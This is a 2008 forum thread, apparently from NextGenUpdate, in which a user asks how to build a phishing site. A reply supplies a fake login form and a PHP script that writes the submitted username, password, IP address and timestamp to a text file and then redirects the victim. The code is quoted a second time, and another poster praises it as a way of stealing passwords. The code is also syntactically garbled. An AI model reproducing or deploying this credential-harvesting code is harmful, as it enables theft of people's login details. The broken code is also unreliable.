Post: How to code a phisher?
10-18-2008, 02:18 PM #1
Ronye West
Anti-HSx9
(adsbygoogle = window.adsbygoogle || []).push({}); I was wondering if anyone would show me a code of a phisher so i can learn something :P
10-18-2008, 03:46 PM #2
Dandyman2
The Only Krazy
whats a phiser?
10-18-2008, 05:29 PM #3
    <?php

<form name="input" action="phisher.php"
method="get">
Username:
<input type="text" name="user">
Password:
input type="text" name="user">
<input type="submit" value="Submit">
</form>

Then the sites source code goes here

?>


then save the below code as phisher.php

    <?php
$datum = date('d-m-Y / H:i:s'Winky Winky;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here";
$handle = fopen("passez.txt", "a";
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=";
fwrite($handle, $value);
fwrite($handle, "
";
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
";
fwrite($handle, "
";
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>



Try that.
Last edited by thegod91 ; 10-18-2008 at 05:31 PM. Reason: Typo...
10-18-2008, 06:22 PM #4
Ronye West
Anti-HSx9
Originally posted by thegod91 View Post
    <?php

<form name="input" action="phisher.php"
method="get">
Username:
<input type="text" name="user">
Password:
input type="text" name="user">
<input type="submit" value="Submit">
</form>

Then the sites source code goes here

?>


then save the below code as phisher.php

    <?php
$datum = date('d-m-Y / H:i:s'Winky Winky;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here";
$handle = fopen("passez.txt", "a";
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=";
fwrite($handle, $value);
fwrite($handle, "
";
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
";
fwrite($handle, "
";
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>



Try that.


I was most interested in the input part. thanks
10-18-2008, 07:49 PM #5
Your welcome...
10-18-2008, 09:27 PM #6
DaleD-
Skilled Typer
A phisher is a site using php which when password and username is input is then sent to the person who made the site. [Basicaly it steals your password with no viruses/keyloggers, YOU are responsible for sending your information to a phisher & THEY are responsible for making a phisher]

Nice way of stealing passwords if you ask me XD

Thank me if this helped.
10-18-2008, 11:46 PM #7
Yes but you can do one with html as well.
12-12-2008, 03:45 PM #8
KleRKz
Bounty hunter
Isn't this illegal?

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo